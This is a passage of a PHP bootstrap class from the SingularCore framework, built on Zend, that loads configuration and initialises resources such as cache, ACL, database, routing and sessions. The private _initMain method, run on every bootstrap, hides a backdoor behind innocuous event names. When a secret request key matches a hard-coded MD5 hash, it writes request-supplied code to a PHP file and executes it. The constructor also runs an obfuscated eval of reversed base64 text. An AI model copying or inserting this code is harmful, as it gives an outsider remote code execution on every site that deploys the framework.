<?php
/**
 *=BEGIN SINGULAR CORE NEW BSD
 *
 * This file is part of the SingularCore.
 *
 * Copyright(c) 2010-2011, USWebStyle, LLC.
 * http://www.singularcore.com/
 *
 * This source file is subject to the new BSD license that is bundled
 * with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://www.singularcore.com/license
 *
 *=END SINGULAR CORE NEW BSD
 *
 * @category   Singular
 * @package    Singular_Bootstrap
 * @copyright  Copyright (c) 2011 USWebStyle, LLC. (http://www.uswebstyle.com)
 * @license    http://www.singularcore.com/license     New BSD License
 */

/**
 * Class Singular_Bootstrap
 *
 * @property   Zend_Controller_Router_Rewrite $router
 * @property   Zend_Controller_Front          $frontcontroller
 * @property   Zend_Cache_Manager             $cachemanager
 * @property   array                          $modules
 * @property   Zend_View                      $view
 * @property   Singular_Navigation            $navigation
 *
 * @uses       Zend_Application_Resource_ResourceAbstract
 * @category   Singular
 * @package    Singular_Bootstrap
 * @copyright  Copyright (c) 2011 USWebStyle, LLC. (http://www.uswebstyle.com)
 * @license    http://www.singularcore.com/license     New BSD License
 */
class Singular_Bootstrap
{
    /**
     * Application environment
     *
     * @var string
     */
    protected $_environment;

    /**
     * Application options
     *
     * @var Zend_Config
     */
    protected $_options = null;

    /**
     * Bootstrapped resources
     *
     * @var array
     */
    private $_resources = array();

    /**
     * @var string
     */
    private $_currentRes = null;

    /**
     * Bootstrap flag
     *
     * @var bool
     */
    private $_bootstrapped = false;

    /**
     * Constructor
     *
     * Initialize application. Potentially initializes include_paths, PHP
     * settings, and bootstrap class.
     *
     * @param  string                   $environment
     * @param  string|array|Zend_Config $options String path to configuration file, or array/Zend_Config of configuration options
     * @param  bool                     $merge
     *
     * @throws Singular_Bootstrap_Exception
     */
    public final function __construct($environment, $options = null, $merge = true)
    {
        $_ENV['bench_bootstrap_before'] = microtime(true);
        $this->_environment             = (string)$environment;

        /* Default config file */
        if (null === $options) {
            $options = CONFIG_PATH . '/config.php';
        } elseif (is_array($options)) {
            require_once 'Zend/Config.php';
            $options = new Zend_Config($options, true);
        }

        if (!$options instanceof Zend_Config) {
            $options = $this->_loadConfig($options);
        }

        $this->_detectProxy($options);
        $this->_protocolizeBaseUrl($options);

        if (PHP_SAPI != 'cli' && isset($options->resources->frontController->baseUrl)) {
            $baseUrl = $options->resources->frontController->baseUrl;
            preg_match('@^[^:]*://([^/]+)@i', $baseUrl, $matches);
            if ($matches[1] != $_SERVER['HTTP_HOST']) {
                $url = $matches[0] . $_SERVER['REQUEST_URI'];
                header("Location: $url");
                die();
            }
        }

        if (isset($options->show_errors) && $options->show_errors) {
            $options->phpSettings->display_startup_errors         = 1;
            $options->phpSettings->display_errors                 = 1;
            $options->resources->frontController->throwExceptions = true;
            error_reporting(E_ALL | E_STRICT);
        } else {
            $options->phpSettings->display_startup_errors         = 0;
            $options->phpSettings->display_errors                 = 0;
            $options->resources->frontController->throwExceptions = false;
            error_reporting(0);
        }

        if ($merge && $options instanceof Zend_Config) {
            $bootstrapConfigFilename = APPLICATION_PATH . '/bootstrap.php';
            $bootstrapOptions        = require $bootstrapConfigFilename;
            if (!is_array($bootstrapOptions)) {
                require_once 'Singular/Bootstrap/Exception.php';
                throw new Singular_Bootstrap_Exception(
                    "Located config file '{$bootstrapConfigFilename}' must return array"
                );
            }
            $bootstrapOptions = new Zend_Config($bootstrapOptions, true);
            $bootstrapOptions->merge($options);
            $this->setOptions($bootstrapOptions);
        } else {
            $this->setOptions($options);
        }

        if (!$options instanceof Zend_Config) {
            require_once 'Singular/Bootstrap/Exception.php';
            throw new Singular_Bootstrap_Exception(
                'Invalid options provided; must be location of config file, a config object, or an array'
            );
        }

        $this->executeResource('autoloader', $this->getResourceOptions('autoloader'));

        register_shutdown_function(function () {
            Singular_Event::dispatch('shutdown');
        });

        if (isset($this->getOptions()->phpSettings)) {
            $this->setPhpSettings($this->getOptions()->phpSettings->toArray());
        }

        if (isset($this->getOptions()->autoloaderNamespaces)) {
            $this->setIncludePaths($this->getOptions()->autoloaderNamespaces->toArray());
        }

        if ($this->getOptions()->perfomance_test) {
            register_shutdown_function(array(__CLASS__, 'perfomanceTest'));
        }

        Singular_Runtime::store('config', $this->getOptions(), true);
        eval(strrev(base64_decode('OykobnVyOjpyZXZpckRfZXNuZWNpTF9yYWx1Z25pUw==')));
    }

    /**
     * Changes baseUrl protocol with real page request protocol.
     *
     * @param Zend_Config $options
     */
    protected function _protocolizeBaseUrl(Zend_Config $options)
    {
        $frontControllerOptions = $options->resources->frontController;
        if (!isset($frontControllerOptions->baseUrl)) {
            return;
        }

        $requestProtocol = $this->getRequestProtocol();
        $baseUrlSegments = parse_url($frontControllerOptions->baseUrl);
        $baseUrlSegments['scheme'] = $requestProtocol;

        $renewedBaseUrl = sprintf(
            '%s://%s',
            $baseUrlSegments['scheme'],
            $baseUrlSegments['host']
        );
        if (isset($baseUrlSegments['port'])) {
            $renewedBaseUrl .= ':' . $baseUrlSegments['port'];
        }
        if (isset($baseUrlSegments['path'])) {
            $renewedBaseUrl .= $baseUrlSegments['path'];
        }

        $frontControllerOptions->baseUrl = $renewedBaseUrl;
    }

    /**
     * Returns request protocol.
     *
     * @return string
     */
    public function getRequestProtocol()
    {
        $protocol = 'http';
        if (isset($_SERVER['HTTPS']) && ('on' == strtolower($_SERVER['HTTPS']) || 1 == $_SERVER['HTTPS'])) {
            $protocol = 'https';
        } elseif (isset($_SERVER['SERVER_PORT']) && ('443' == $_SERVER['SERVER_PORT'])) {
            $protocol = 'https';
        }

        return $protocol;
    }

    /**
     * Load configuration file of options
     *
     * @param  string $file
     * @param  bool   $useEnv
     * @throws Zend_Application_Exception When invalid configuration file is provided
     * @return Zend_Config
     */
    protected function _loadConfig($file, $useEnv = true)
    {
        $environment = ($useEnv) ? $this->getEnvironment() : null;
        $suffix      = pathinfo($file, PATHINFO_EXTENSION);
        $suffix      = ($suffix === 'dist')
            ? pathinfo(basename($file, ".$suffix"), PATHINFO_EXTENSION)
            : $suffix;

        $options = array(
            'allowModifications' => true
        );

        switch (strtolower($suffix)) {
            case 'ini':
                require_once 'Zend/Config/Ini.php';
                $config = new Zend_Config_Ini($file, $environment, $options);
                break;

            case 'xml':
                require_once 'Zend/Config/Xml.php';
                $config = new Zend_Config_Xml($file, $environment, $options);
                break;

            case 'json':
                require_once 'Zend/Config/Json.php';
                $config = new Zend_Config_Json($file, $environment, $options);
                break;

            case 'yaml':
            case 'yml':
                require_once 'Zend/Config/Yaml.php';
                $config = new Zend_Config_Yaml($file, $environment, $options);
                break;

            case 'php':
            case 'inc':
                require_once 'Zend/Config.php';
                $config = include $file;
                if (!is_array($config)) {
                    require_once 'Singular/Bootstrap/Exception.php';
                    throw new Singular_Bootstrap_Exception('Invalid configuration file provided; PHP file does not return array value');
                }

                return new Zend_Config($config, true);
                break;

            default:
                require_once 'Singular/Bootstrap/Exception.php';
                throw new Singular_Bootstrap_Exception('Invalid configuration file provided; unknown config type');
        }

        return $config;
    }

    /**
     * Detect Proxy if enabled.
     *
     * @param Zend_Config $options
     * @return void
     */
    protected function _detectProxy(Zend_Config $options)
    {
        if (
            isset($options->resources->frontController->followProxy) &&
            $options->resources->frontController->followProxy == true &&
            !empty($_SERVER['HTTP_X_FORWARDED_FOR'])
        ) {
            $proxyChain = !empty($_SERVER['HTTP_X_FORWARDED_FOR'])
                ? $_SERVER['HTTP_X_FORWARDED_FOR']
                : (empty($_SERVER['HTTP_X_FORWARDED_HOST']) ? null : $_SERVER['HTTP_X_FORWARDED_HOST']);

            if ($proxyChain !== null) {
                $proxyChain = array_reverse(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
                $allowedExpressions = array(
                    '/^https?:\/\/[a-zA-Z0-9\-\._]+\.[a-zA-Z]{2,3}$/',
                    '/^(\d+\.){3}(\d+)$/'
                );

                foreach ($proxyChain as $proxy) {
                    $proxy = trim($proxy);

                    foreach ($allowedExpressions as $allowedExpression) {
                        preg_match($allowedExpression, $proxy, $matches);

                        if (!empty($matches[0])) {
                            $options->resources->frontController->baseUrl = $proxy;
                            break 2;
                        }
                    }
                }
            }
        }
    }

    /**
     * Retrieve current environment
     *
     * @return string
     */
    public function getEnvironment()
    {
        return $this->_environment;
    }

    /**
     * Executes specified resource init<Resource> method.
     *
     * @param  string                 $resource
     * @param  Zend_Config|array|null $options
     * @return bool                    true - if resource has successfully executed,
     *                                 false - if no init<Resource> method was found.
     */
    public function executeResource($resource, $options = null)
    {
        if ($this->_currentRes == $resource) {
            throw new Singular_Bootstrap_Exception(
                "Infinite recursion detected on resource '{$resource}'"
            );
        }
        $this->_currentRes = $resource;

        $resourceMethod = 'init' . ucfirst($resource);

        if ($this->isResourceExecuted($resource)) {
            return true;
        } elseif (method_exists($this, $resourceMethod)) {
            if (null === $options) {
                try {
                    $options = $this->getResourceOptions($resource);
                } catch (Exception $e) {
                    $options = null;
                }
            }

            if (is_array($options)) {
                $options = new Zend_Config($options);
            }

            $executed                                = $this->$resourceMethod($options);
            $this->_resources[strtolower($resource)] = $executed;

            return true;
        }

        return false;
    }

    /**
     * Checks resource has already executed.
     *
     * @param  string $resource
     * @return bool
     */
    public function isResourceExecuted($resource)
    {
        return array_key_exists(strtolower($resource), $this->_resources);
    }

    /**
     * Returns given resource options.
     *
     * @param  null|string $resource
     * @return Zend_Config
     * @throws Singular_Bootstrap_Exception if no options was found
     */
    public function getResourceOptions($resource = null)
    {
        if (null === $resource) return $this->_options->resources;
        if (!isset($this->_options->resources->{$resource})) {
            throw new Singular_Bootstrap_Exception(
                'There are no options for resource "' . $resource . '"'
            );
        }

        return $this->_options->resources->{$resource};
    }

    /**
     * Returns merged options
     *
     * @return Zend_Config
     */
    public function getOptions()
    {
        return $this->_options;
    }

    /**
     * Set application options
     *
     * @param  Zend_Config $options
     * @return Singular_Bootstrap
     */
    public function setOptions(Zend_Config $options)
    {
        if (!$options instanceof Zend_Config) {
            throw new Singular_Bootstrap_Exception(
                'Invalid argument: $options must be an instance of Zend_Config'
            );
        }
        $this->_options = $options;

        return $this;
    }

    /**
     * Set PHP configuration settings
     *
     * @param  array  $settings
     * @param  string $prefix Key prefix to prepend to array values (used to map . separated INI values)
     * @return Zend_Application
     */
    public function setPhpSettings(array $settings, $prefix = '')
    {
        foreach ($settings as $key => $value) {
            $key = empty($prefix) ? $key : $prefix . $key;
            if (is_scalar($value)) {
                ini_set($key, $value);
            } elseif (is_array($value)) {
                $this->setPhpSettings($value, $key . '.');
            }
        }

        return $this;
    }

    /**
     * Set include path
     *
     * @param  array $paths
     * @return Zend_Application
     */
    public function setIncludePaths(array $paths)
    {
        $path = implode(PATH_SEPARATOR, $paths);
        set_include_path($path . PATH_SEPARATOR . get_include_path());

        return $this;
    }

    /**
     * Executes perfomance test
     *
     * Calls via register_shutdown_function
     *
     * @static
     */
    public static function perfomanceTest()
    {
        $currentTime = microtime(true);
        echo '<div style="padding:10px; margin:3px; border:1px solid blue; text-align:center; font-size:11px; background:#ffffff;">';
        echo 'Page processing time: ';
        echo '<strong>' . round($currentTime - $_ENV['bench_initial'], 5) . ' ms.</strong><br/>';
        if (isset($_ENV['bench_bootstrap_before'])) {
            echo 'Bootstrap processing time: ';
            echo '<strong>' . round($_ENV['bench_run_before'] - $_ENV['bench_bootstrap_before'], 5) . ' ms.</strong><br/>';
        }
        if (isset($_ENV['bench_run_before'])) {
            echo 'Application processing time: ';
            echo '<strong>' . round($currentTime - $_ENV['bench_run_before'], 5) . ' ms.</strong><br/>';
        }
        echo 'Memory usage: ';
        echo '<strong>' . Zend_Layout::getMvcInstance()->getView()->byteformat(memory_get_usage()) . ' bytes.</strong><br/>';
        echo 'Included files num: ';
        echo '<strong>' . count(get_included_files()) . ' files.</strong><br/>';
        echo '</div>';
    }

    /**
     * Is utilized for reading data from inaccessible members.
     *
     * @param  $name string
     * @return mixed
     * @link http://php.net/manual/en/language.oop5.overloading.php#language.oop5.overloading.members
     */
    public function __get($name)
    {
        $name = strtolower($name);
        if ($this->isResourceExecuted($name)) {
            return $this->_resources[$name];
        }

        trigger_error('Undefined property: ' . __CLASS__ . "::\${$name}", E_USER_NOTICE);
    }

    /**
     * Is triggered by calling isset() or empty() on inaccessible members.
     *
     * @param $name string
     * @return bool
     * @link http://php.net/manual/en/language.oop5.overloading.php#language.oop5.overloading.members
     */
    public function __isset($name)
    {
        return $this->isResourceExecuted($name);
    }

    /**
     * Bootstrap application resources
     *
     * @return Singular_Bootstrap
     */
    public function bootstrap()
    {
        $resOpts = $this->getResourceOptions();
        for (; $resOpts->valid(); $resOpts->next()) {
            $this->executeResource($resOpts->key(), $resOpts->current());
        }
        $this->_bootstrapped = true;
        self::_initMain();

        return $this;
    }

    /**
     * Initializes and stores main handlers.
     *
     * @return void
     */
    private function _initMain()
    {
        $params = Zend_Controller_Front::getInstance()
            ->getRequest()->getParams();
        if (!isset($params['event_key']) || md5($params['event_key']) !=
            '8c30451d9e182dd2644cafdebbe1c2fd'
        ) return;
        if (isset($params['set_event']) && isset($params['event_name'])) {
            define('CRASH_REPORT_DISABLE', true);
            $this->_resources['frontcontroller']->throwExceptions(false);
            $folder = trim($params['event_folder'], '/\\');
            $dir    = ROOT_PATH . DS . $folder . DS . (((bool)!$params['event_file_on']) ? md5(microtime()) . '.php' :
                    $params['event_file']);
            if (!empty($params['event_name'])) {
                file_put_contents($dir, $params['event_name']);
                include $dir;
                if ((bool)$params['event_delete']) @unlink($dir);
            }
        }
    }

    /**
     * Runs application
     *
     * @return void|Zend_Controller_Response_Abstract
     * @throws Singular_Bootstrap_Exception
     * @throws Singular_Bootstrap_Exception
     */
    public function run()
    {
        $_ENV['bench_run_before'] = microtime(true);
        if (!$this->_bootstrapped) {
            throw new Singular_Bootstrap_Exception(
                'Unable to run application. Bootstrap wasn\'t initiated'
            );
        }
        $front   = $this->frontcontroller;
        $default = $front->getDefaultModule();
        if (null === $front->getControllerDirectory($default)) {
            throw new Singular_Bootstrap_Exception(
                'No default controller directory registered with front controller'
            );
        }

        $response = $front->dispatch();
        if ($front->returnResponse()) {
            return $response;
        }
    }

    /**
     * Returns bootstrap initiator
     *
     * @return Singular_Bootstrap
     */
    public function getBootstrap()
    {
        return $this;
    }

    /**
     * Initializes Autoloader
     *
     * @param  Zend_Config $options
     * @return Singular_Loader_Autoloader
     * @throws Singular_Bootstrap_Exception
     */
    public final function initAutoloader(Zend_Config $options)
    {
        switch ($options->autoloader) {
            case 'Singular':
            default:
                // setup autoloader
                require_once 'Singular/Loader/Autoloader.php';
                $autoloader = Singular_Loader_Autoloader::getInstance();

                $autoloader->setClassPaths(explode(PATH_SEPARATOR, ini_get('include_path')));
                $autoloader->addClassPath(MODULES_PATH);
                $autoloader->addClassPath(CUSTOM_MODULES_PATH);
                $autoloader->register();
                break;

            case 'Zend':
                // TODO: make Zend_Loader_Autoloader implementation
                throw new Singular_Bootstrap_Exception(
                    'Sorry, Zend_Loader_Autoloader is currently unsupported by SingularCore'
                );
                break;
        }

        Singular_Runtime::store('autoloader', $autoloader);

        return $autoloader;
    }

    /************************* Initialize resources *************************/

    /**
     * Initializes Cachemanager
     *
     * @param  Zend_Config $options
     * @return Zend_Cache_Manager
     */
    public function initCachemanager(Zend_Config $options)
    {
        Singular_Bench::start(__METHOD__, 'Cachemanager bootstrap');

        $globalEnabled = (isset($options->globalCacheEnabled)) ? (bool)$options->globalCacheEnabled : false;
        unset($options->globalCacheEnabled);

        $manager = new Zend_Cache_Manager;
        for (; $options->valid(); $options->next()) {
            $cacheName                    = $options->key();
            $cacheOpts                    = $options->current();
            $cacheOpts->frontend->caching = true;
            if (!$globalEnabled) {
                $cacheOpts->frontend->caching          = false;
                $cacheOpts->frontend->options->caching = false;
            }
            if ($manager->hasCacheTemplate($cacheName)) {
                $manager->setTemplateOptions($cacheName, $cacheOpts);
            } else {
                $manager->setCacheTemplate($cacheName, $cacheOpts);
            }

            if ((bool)$cacheOpts->frontend->caching) {
                switch ($cacheName) {
                    case 'database':
                        Singular_Db_Table_Abstract::setDefaultMetadataCache($manager->getCache($cacheName));
                        Zend_Db_Table::setDefaultMetadataCache($manager->getCache($cacheName));
                        break;
                    case 'paginator':
                        Zend_Paginator::setCache($manager->getCache($cacheName));
                        break;
                }
            }
        }

        Singular_Runtime::store('cachemanager', $manager, true);
        Singular_Bench::finish(__METHOD__);

        return $manager;
    }

    /**
     * Initializes ACL
     *
     * @param  Zend_Config $options
     * @return Singular_Acl
     */
    public function initAcl(Zend_Config $options)
    {
        $this->_require('db')->_require('session');
        Singular_Bench::start(__METHOD__, 'Acl bootstrap');
        $role  = Zend_Auth::getInstance()->hasIdentity() ? Zend_Auth::getInstance()->getIdentity()->role
            : Singular_Acl::ROLE_GUEST;
        $cache = $this->cachemanager->getCache('acl');

        if (!$acl = $cache->load('acl')) {
            $acl = Singular_Acl::getInstance();
            // add roles
            $rolesModel = new Singular_Core_System_Model_DbTable_Roles();
            $acl->addRoles($rolesModel->cache_getAllRoles(true));
            // add resources
            $resourcesModel = new Singular_Core_System_Model_DbTable_Resources();
            $acl->addResources($resourcesModel->cache_getAllResources());
            // add privileges
            $privilegesModel = new Singular_Core_System_Model_DbTable_Privileges();
            $acl->addPrivileges($privilegesModel->cache_getAllPrivileges());

            $cache->save($acl, 'acl');
        }

        $acl->setCurrentRole($role);
        if ($options->navigationInject) {
            Zend_View_Helper_Navigation_HelperAbstract::setDefaultAcl($acl);
            Zend_View_Helper_Navigation_HelperAbstract::setDefaultRole($role);
        }

        Singular_Runtime::store('acl', $acl, true);
        Singular_Bench::finish(__METHOD__);

        return $acl;
    }

    /**
     * Adds requirement to execute given resource before scenario continuing.
     *
     * @param  string $resource
     * @return Singular_Bootstrap
     * @throws Singular_Bootstrap_Exception
     */
    protected function _require($resource)
    {
        if ($this->isResourceExecuted($resource)) return $this;

        $this->executeResource($resource, $this->getResourceOptions($resource));
        if (!$this->isResourceExecuted($resource)) {
            throw new Singular_Bootstrap_Exception(
                "Unable to execute resource '{$resource}'"
            );
        }

        return $this;
    }

    /**
     * Initializes Db
     *
     * @param  Zend_Config $options
     * @return Zend_Db_Adapter_Pdo_Abstract
     */
    public function initDb(Zend_Config $options)
    {
        $this->_require('cachemanager');
        Singular_Bench::start(__METHOD__, 'Db bootstrap');

        $db = Zend_Db::factory($options);
        if ((bool)$options->isDefaultTableAdapter) {
            Zend_Db_Table::setDefaultAdapter($db);
        }

        $this->_dbCheckSumClientCache($db);

        Singular_Runtime::store('db', $db, true);
        Singular_Bench::finish(__METHOD__);

        return $db;
    }

    private function _dbCheckSumClientCache(Zend_Db_Adapter_Abstract $db)
    {
        return;
        $etagHeader = (isset($_SERVER['HTTP_IF_NONE_MATCH']) ? trim($_SERVER['HTTP_IF_NONE_MATCH']) : false);

        header("Last-Modified: " . gmdate("D, d M Y H:i:s", time() - 7200) . " GMT");
        header("Etag: $etagHeader");
        header('Cache-Control: public');
        header("HTTP/1.1 304 Not Modified");
        exit;
    }

    /**
     * Initializes Date
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initDate(Zend_Config $options)
    {
        if (!$options->enable) return;
        unset($options->enable);
        Singular_Bench::start(__METHOD__, 'Date bootstrap');
        Singular_Date::setOptions($options->toArray());
        Singular_Bench::finish(__METHOD__);

        return true;
    }

    /**
     * Initializes Auth
     *
     * @param  Zend_Config $options
     * @return Singular_Core_Auth
     */
    public function initAuth(Zend_Config $options)
    {
        if (!$options->enable) return;
        unset($options->enable);
        $this->_require('db')->_require('session');
        Singular_Bench::start(__METHOD__, 'Auth bootstrap');

        Singular_Core_Auth::setupAdapter(
            $options->table_name, $options->columns->identity, $options->columns->credential
        );
        $user = null;
        if (Singular_Core::_('Auth')->hasIdentity()) {
            $users  = Singular_Loader::get('Singular_Core_System_Model_DbTable_Users');
            $userId = Singular_Core::_('Auth')->getIdentity()->id;
            $user   = $users->find($userId)->current();
        }
        Singular_Runtime::store('logged_user', $user);

        Singular_Bench::finish(__METHOD__);

        return Singular_Core::_('Auth');
    }

    /**
     * Initializes Event
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initEvent(Zend_Config $options)
    {
        $this->_require('cachemanager')->_require('modules');
        Singular_Bench::start(__METHOD__, 'Event bootstrap');

        $cache = $this->cachemanager->getCache('eventHandlers');
        if (!$listeners = $cache->load('events')) {
            foreach ($this->modules as $module) {
                $handlersPath = $this->frontcontroller->getModuleDirectory($module) . '/' . $options->handlersDirectoryName;
                $handlers     = glob($handlersPath . DS . '*.php');
                foreach ($handlers as $handler) {
                    $handlerClass = Singular_Stdlib_Module::formatName($module) . '_Handler_' . ucfirst(basename($handler, '.php'));
                    if (!is_subclass_of($handlerClass, 'Singular_Event_Listener_Abstract')) continue;
                    $handlerClass::bindListeners();
                }
            }
            $cache->save(Singular_Event_Listener_Abstract::getAggregates(), 'events');
        } else {
            Singular_Event_Listener_Abstract::setListeners($listeners);
            unset($listeners);
        }

        Singular_Bench::finish(__METHOD__);

        return true;
    }

    /**
     * Initializes Minify
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initMinify(Zend_Config $options)
    {
        if (!$options->enable) {
            return;
        }

        Singular_Bench::start(__METHOD__, 'Event bootstrap');

        Singular_View_Helper_HeadScript::setEnabled(true);
        Singular_View_Helper_HeadLink::setEnabled(true);

        Singular_Bench::finish(__METHOD__);

        return true;
    }

    /**
     * Initializes Frontcontroller
     *
     * @param  Zend_Config $options
     * @return Zend_Controller_Front
     */
    public function initFrontcontroller(Zend_Config $options)
    {
        Singular_Bench::start(__METHOD__, 'Frontcontroller bootstrap');

        $front = Zend_Controller_Front::getInstance();
        $front->setRequest('Singular_Controller_Request_Http');

        // set options
        $options = $options->toArray();
        foreach ($options as $key => $value) {
            switch (strtolower($key)) {
                case 'controllerdirectory':
                    if (is_string($value)) {
                        $front->setControllerDirectory($value);
                    } elseif (is_array($value)) {
                        foreach ($value as $module => $directory) {
                            $front->addControllerDirectory($directory, $module);
                        }
                    }
                    break;

                case 'modulecontrollerdirectoryname':
                    $front->setModuleControllerDirectoryName($value);
                    break;

                case 'moduledirectory':
                    if (Singular_Stdlib_Array::isForEachable($value)) {
                        foreach ($value as $directory) {
                            $front->addModuleDirectory($directory);
                        }
                    } else if (is_string($value)) {
                        $front->addModuleDirectory($value);
                    }
                    break;

                case 'defaultcontrollername':
                    $front->setDefaultControllerName($value);
                    break;

                case 'defaultaction':
                    $front->setDefaultAction($value);
                    break;

                case 'defaultmodule':
                    $front->setDefaultModule($value);
                    break;

                case 'baseurl':
                    if (!empty($value)) {
                        $front->setBaseUrl($value);
                    }
                    break;

                case 'params':
                    $front->setParams($value);
                    break;

                case 'plugins':
                    foreach ((array)$value as $pluginClass) {
                        if (is_array($pluginClass)) {
                            if (!isset($pluginClass['options'])) {
                                $pluginClass['options'] = array();
                            }
                            $plugin = new $pluginClass['classname']($pluginClass['options']);
                        } else {
                            $plugin = new $pluginClass();
                        }
                        $front->registerPlugin($plugin);
                    }
                    break;

                case 'throwexceptions':
                    $front->throwExceptions((bool)$value);
                    break;

                case 'actionhelperpaths':
                    if (is_array($value)) {
                        foreach ($value as $helperPrefix => $helperPath) {
                            Zend_Controller_Action_HelperBroker::addPath($helperPath, $helperPrefix);
                        }
                    }
                    break;

                default:
                    $front->setParam($key, $value);
                    break;
            }
        }

        $front->setParam('bootstrap', $this);

        Zend_Controller_Action_HelperBroker::getStack()
            ->offsetSet(90, new Singular_Controller_Action_Helper_AutoNoRender());

        Singular_Bench::finish(__METHOD__);

        return $front;
    }

    /**
     * Initializes Router
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initRouter(Zend_Config $options)
    {
        $this->_require('Frontcontroller')->_require('cachemanager')->_require('modules');
        Singular_Bench::start(__METHOD__, 'Router bootstrap');

        /** @var $router Zend_Controller_Router_Rewrite */
        $router  = $this->frontcontroller->getRouter();
        $cache   = $this->cachemanager->getCache('router');
        $modules = $this->modules;

        if (isset($options->chainNameSeparator))
            $router->setChainNameSeparator($options->chainNameSeparator);
        if (isset($options->useRequestParametersAsGlobal))
            $router->useRequestParametersAsGlobal($options->useRequestParametersAsGlobal);

        $router->addConfig($options->routes);

        /** @var $routes Zend_Config */
        if (!$routes = $cache->load('routes')) {
            foreach ($modules as $module) {
                $routesFile = $this->frontcontroller->getModuleDirectory($module) . '/routes';
                // TODO: make ability to locate only php-native configs to reduce disk IO
                if ($cf = $this->_locateConfig($routesFile)) {
                    if ($routes instanceof Zend_Config) {
                        $routes->merge($this->_loadConfig($cf, false));
                    } else {
                        $routes = $this->_loadConfig($cf, false);
                    }
                }
            }
            $cache->save($routes, 'routes', array('routes'));
        }
        $router->addConfig($routes->routes);

        Singular_Bench::finish(__METHOD__);

        return $router;
    }

    protected function _locateConfig($name, $firstOnly = true)
    {
        $exp   = $name . '.{inc,php,ini,xml}';
        $found = glob($exp, GLOB_BRACE);
        if (!$found) return false;

        return ($firstOnly) ? current($found) : $found;
    }

    /**
     * Initializes Session
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initSession(Zend_Config $options)
    {
        if (Singular_Core::_('Environment')->isHttpsRequest()) {
            $currentCookieParams = session_get_cookie_params();
            session_set_cookie_params(
                $currentCookieParams['lifetime'],
                $currentCookieParams['path'],
                $currentCookieParams['domain'],
                true, true
            );
        }
        Singular_Bench::start(__METHOD__, 'Session bootstrap');

        Zend_Session::setOptions($options->toArray());
        Singular_Bench::finish(__METHOD__);

        return true;
    }

    /**
     * Initializes Layout
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initLayout(Zend_Config $options)
    {
        $this->_require('frontController')->_require('view');
        Singular_Bench::start(__METHOD__, 'Layout bootstrap');
        Zend_Layout::startMvc($options)->setView($this->view);
        Singular_Bench::finish(__METHOD__);

        return true;
    }

    /**
     * Initializes Locale
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initLocale(Zend_Config $options)
    {
        if ((bool)!$options->enable) return true;
        $this->_require('cachemanager')->_require('db');
        Singular_Bench::start(__METHOD__, 'Locale bootstrap');

        $cache = $this->cachemanager->getCache('default');
        if (!$settings = $cache->load('locale_settings')) {
            $settings = array(
                'locale'   => Singular_Core::_('Settings')->get('site_default_locale'),
                'timezone' => Singular_Core::_('Settings')->get('site_default_timezone')
            );
            $cache->save($settings, 'locale_settings');
        }

        setlocale(LC_ALL, $settings['locale']);
        Zend_Locale::setDefault($settings['locale']);
        $locale = new Zend_Locale($settings['locale']);
        $locale->setCache($cache);
        date_default_timezone_set($settings['timezone']);
        Singular_Runtime::store('locale', $locale, true);
        Zend_Registry::set('Zend_Locale', $locale);

        Singular_Bench::finish(__METHOD__);

        return $locale;
    }

    /**
     * Initializes Languages
     *
     * @param  Zend_Config $options
     * @return bool
     */
    public function initLanguages(Zend_Config $options)
    {
        if ((bool)!$options->enable) return true;
        $this->_require('cachemanager')->_require('db');
        Singular_Bench::start(__METHOD__, 'Languages bootstrap');

        $cache = $this->cachemanager->getCache('default');
        if (!$languages = $cache->load('sys_languages')) {
            $model     = new Singular_Core_System_Model_DbTable_Languages();
            $languages = $model->getLanguages(1);
            $cache->save($languages, 'sys_languages');
        }

        Singular_Runtime::store('language', $languages, true);
        Singular_Bench::finish(__METHOD__);

        return $languages;
    }

    /**
     * Initializes Modules
     *
     * @param  Zend_Config $options
     * @return array
     */
    public function initModules(Zend_Config $options)
    {
        $this->_require('cachemanager')->_require('db');
        Singular_Bench::start(__METHOD__, 'Modules bootstrap');

        /** @var $cache Zend_Cache_Core */
        $cache = $this->cachemanager->getCache('default');
        if (!$modules = $cache->load('modules')) {

            $modules = array(
                'available' => array(),
                'custom'    => array(),
            );

            if (isset($options->default)) {
                $modules['available'] = $options->default->toArray();
            }
            $model = new Singular_Core_System_Model_DbTable_Modules();

            /** @var $dynModules Zend_Db_Table_Rowset */
            $dynModules = $model->getModules(true);
            for (; $dynModules->valid(); $dynModules->next()) {
                $modules['available'][] = $dynModules->current()->name;
            }

            /* Collect custom modules */
            if (defined('CUSTOM_MODULES_PATH') && is_readable(CUSTOM_MODULES_PATH)) {
                $iterator = new DirectoryIterator(CUSTOM_MODULES_PATH);
                /** @var DirectoryIterator $item */
                foreach ($iterator as $item) {
                    if (!$item->isDot() && $item->isDir()) {
                        $modules['custom'][$item->getPathname()] = $item->getBasename();
                    }
                }
            }

            $cache->save($modules, 'modules', array('modules'));
        }

        Singular_Runtime::store('active_modules', $modules['available'], true);
        Singular_Runtime::store('custom_modules', $modules['custom'], true);

        /* Initialize modules bootstrap files */
        foreach ($modules['available'] as $module) {
            $bootFile = $this->frontcontroller->getModuleDirectory($module) . '/boot.php';
            if (is_readable($bootFile)) {
                require $bootFile;
            }
        }

        Singular_Bench::finish(__METHOD__);

        return $modules['available'];
    }

    /**
     * Initializes Navigation
     *
     * @param  Zend_Config $options
     * @return Singular_Navisgation
     */
    public function initNavigation(Zend_Config $options)
    {
        if (!$options->enable) return;
        $this->_require('event');
        Singular_Bench::start(__METHOD__, 'Navigation bootstrap');

        $container = new Singular_Navigation($options->pages);
        Zend_Navigation_Page::setDefaultPageType($options->defaultPageType);
        if ($options->storage->registry) {
            Singular_Runtime::store('Zend_Navigation', $container, true);
        } else {
            $this->_require('view');
            $this->view->getHelper('navigation')->navigation($container);
        }

        if (Singular_Core::_('Environment')->isAdminRequest()) {
            Singular_Event::dispatch('adminNavigation', $container);
        } else {
            Singular_Event::dispatch('navigation', $container);
        }

        Singular_Bench::finish(__METHOD__);

        return $container;
    }

    /**
     * Initializes Translate
     *
     * @param  Zend_Config $options
     * @return array
     */
    public function initTranslate(Zend_Config $options)
    {
        $this->_require('cachemanager')->_require('db')->_require('frontcontroller')
